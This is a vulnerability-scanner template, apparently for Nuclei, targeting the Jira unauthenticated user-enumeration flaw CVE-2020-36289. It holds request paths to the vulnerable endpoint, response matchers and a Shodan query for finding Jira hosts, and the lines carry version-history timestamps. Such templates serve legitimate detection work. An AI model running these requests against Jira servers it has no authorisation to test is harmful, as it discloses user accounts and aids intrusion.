2021-06-09 15:43:52 +00:00
id : CVE-2020-36289
info :
name : Atlassian Jira Unauth User Enumeration
author : dhiyaneshDk
severity : medium
2022-05-17 09:18:12 +00:00
description : Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
2022-05-17 09:18:12 +00:00
- https://jira.atlassian.com/browse/JRASERVER-71559
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-36289
cwe-id : CWE-200
2022-07-04 13:17:36 +00:00
metadata :
shodan-query : http.component:"Atlassian Jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,jira,atlassian,unauth
2021-06-09 15:43:52 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
2021-06-14 15:50:25 +00:00
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
2021-06-09 15:43:52 +00:00
2022-09-28 06:00:58 +00:00
stop-at-first-match : true
2021-06-09 15:43:52 +00:00
matchers-condition : and
matchers :
- type : word
2022-09-28 06:00:58 +00:00
part : body
2021-06-09 15:43:52 +00:00
words :
- 'rel=\"admin\"'
- type : word
2022-09-28 06:00:58 +00:00
part : header
2021-06-09 15:43:52 +00:00
words :
- 'application/json'
2022-09-28 06:00:58 +00:00
- type : status
status :
- 200